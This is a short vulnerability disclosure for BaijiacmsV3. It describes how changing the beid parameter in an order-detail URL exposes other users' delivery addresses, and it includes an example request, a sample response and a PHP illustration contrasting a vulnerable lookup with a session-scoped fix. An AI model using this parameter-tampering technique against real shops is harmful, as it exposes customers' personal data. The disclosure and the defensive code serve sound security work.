BaijiacmsV3 information disclosure

2018-05-02  达浪_7928

Information leakage caused by improper authorization control (https://github.com/baijiacms/baijiacmsV3)

In the admin backend, add a store; after its domain name is configured, visit the store home page.

The order detail response leaks the user's receiving (delivery) address.

Example: http://127.0.0.1/baijiacmsV3-master/index.php?mod=mobile&name=shopwap&do=myorder&op=detail&orderid=3&beid=2

Response: {"message":{"id":"1","realname":"zhangsan","mobile":"13112345678","province":"\u5317\u4eac\u5e02","city":"\u5317\u4eac\u8f96\u533a","area":"\u4e1c\u57ce\u533a","address":"zhangsan_test"},"redirect":"","type":"ajax"}

The beid parameter value can be modified to view other users' receiving addresses, because the lookup is not tied to the logged-in user.
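As an added illustration (not code from baijiacms; the table and column names orders, user_id and beid, and the function names, are assumptions), here is the weak lookup pattern that produces a leak of this kind, next to a hardened version that scopes the same query by the user id held in the server-side session. The sample rows are constructed.

```php
<?php
// Added example, not baijiacms code. Schema and names are assumptions.
declare(strict_types=1);

// Constructed in-memory SQLite data: one order per store, owned by different users.
function buildSampleDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE orders (
        id INTEGER NOT NULL, beid INTEGER NOT NULL, user_id INTEGER NOT NULL,
        realname TEXT, mobile TEXT, address TEXT, PRIMARY KEY (beid, id))');
    $ins = $db->prepare('INSERT INTO orders VALUES (?, ?, ?, ?, ?, ?)');
    $ins->execute([3, 1, 10, 'lisi',     '131xxxx0000', 'lisi_test']);      // store 1, user 10
    $ins->execute([3, 2, 20, 'zhangsan', '131xxxx1111', 'zhangsan_test']);  // store 2, user 20
    return $db;
}

// Weak pattern: only request parameters select the row, so whoever supplies
// a valid orderid/beid pair receives the address (the behaviour reported above).
function orderDetailWeak(PDO $db, int $orderId, int $beid): ?array {
    $stmt = $db->prepare('SELECT realname, mobile, address FROM orders WHERE id = ? AND beid = ?');
    $stmt->execute([$orderId, $beid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: the row must also belong to the authenticated user. The
// user id comes from the session, never from a request parameter, and a
// mismatch is treated the same as a missing order.
function orderDetail(PDO $db, int $orderId, int $beid, ?int $sessionUserId): ?array {
    if ($sessionUserId === null) {
        return null; // not logged in: no order details at all
    }
    $stmt = $db->prepare(
        'SELECT realname, mobile, address FROM orders WHERE id = ? AND beid = ? AND user_id = ?'
    );
    $stmt->execute([$orderId, $beid, $sessionUserId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        // Audit trail for defenders: a denied lookup with valid-looking ids is
        // worth counting per user, since bursts of them indicate id probing.
        error_log(sprintf('order detail denied: user=%d orderid=%d beid=%d', $sessionUserId, $orderId, $beid));
        return null;
    }
    return $row;
}

// Demonstration with the constructed data; user 10 is the logged-in user.
$db = buildSampleDb();
$me = 10;
var_dump(orderDetailWeak($db, 3, 2));   // other user's address is returned
var_dump(orderDetail($db, 3, 1, $me));  // own order: address returned
var_dump(orderDetail($db, 3, 2, $me));  // other store's order: NULL
var_dump(orderDetail($db, 3, 1, null)); // anonymous: NULL
```

The fix is not the prepared statement (the original report says nothing about injection) but the extra `user_id = ?` predicate bound to the session: an object reference supplied by the client is only ever resolved within the set of objects the current principal owns. Returning the same null result for "does not exist" and "not yours" also avoids confirming which orderid/beid pairs are valid.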
